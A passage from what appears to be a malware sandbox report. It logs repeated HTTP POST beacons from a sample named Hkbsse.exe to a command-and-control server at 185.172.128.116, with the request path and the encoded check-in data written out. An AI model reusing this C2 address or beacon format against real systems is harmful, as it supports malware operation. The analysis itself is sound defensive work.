                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        89192.168.2.559061185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:26.048746109 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:26.694272041 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:26.695363998 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:26.886090994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        90192.168.2.559062185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:27.001327991 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:27.634556055 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:27 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:27.640503883 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:27.831435919 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:27 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        91192.168.2.559063185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:28.157610893 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:28.820882082 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:28 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:28.822117090 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:29.018326044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:28 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        92192.168.2.559064185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:29.129606009 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:29.908219099 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:29 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:29.911612034 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:30.107789993 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:30 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        93192.168.2.559065185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:30.221357107 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:30.875575066 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:30 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:30.876640081 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:31.074234009 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:30 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        94192.168.2.559066185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:31.189013958 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:31.842000008 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:31 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:31.847780943 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:32.049410105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:31 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        95192.168.2.559067185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:32.157639980 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:32.799740076 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:32 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:32.800894022 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:32.992247105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:32 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        96192.168.2.559068185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:33.117403030 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:33.754853010 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:33 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:33.759030104 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:33.953701019 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:33 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        97192.168.2.559069185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.064393044 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.972063065 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:34 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.973156929 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:34 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.973314047 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
